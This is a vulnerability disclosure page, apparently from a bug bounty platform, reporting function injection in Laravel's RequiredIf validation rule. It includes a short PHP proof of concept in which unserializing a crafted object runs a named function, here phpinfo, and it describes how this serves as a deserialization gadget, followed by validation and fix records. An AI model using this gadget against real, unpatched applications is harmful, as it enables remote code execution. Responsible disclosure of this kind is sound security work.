Code Injection in laravel/framework

Valid

Reported on

Jun 12th 2021

โœ๏ธ Description

Function injection in Illuminate\Validation\Rules\RequiredIf can be exploited to generate gadget chains for deserialization vulnerabiltiies.

๐Ÿ•ต๏ธโ€โ™‚๏ธ Proof of Concept

<?php
use Illuminate\Validation\Rules\RequiredIf;

require("vendor/autoload.php");

$gadget = serialize(new RequiredIf("phpinfo"));

echo unserialize($gadget); // exploitation

As soon as the object is casted to string, function phpinfo gets executed.

๐Ÿ’ฅ Impact

This vulnerability is capable of calling callables and can be utilized in POP gadget chains when exploiting deserialization vulnerabilities.

0xcrypto modified the report
2 years ago
0xcrypto submitted a
patch
2 years ago
Jamie Slome
2 years ago

Admin

@taylorotwell, can you just confirm that this report is valid?

Jamie Slome validated this vulnerability 2 years ago
0xcrypto has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jamie Slome marked this as fixed with commit 814d6b 2 years ago
0xcrypto has been awarded the fix bounty
This vulnerability will not receive a CVE
0xcrypto
2 years ago

Researcher

@jamieslome is it possible to get CVE on this one?

Jamie Slome
2 years ago

Admin

@0xcrypto - we would first require the go-ahead from the maintainer before assigning a CVE here ๐Ÿ‘

to join this conversation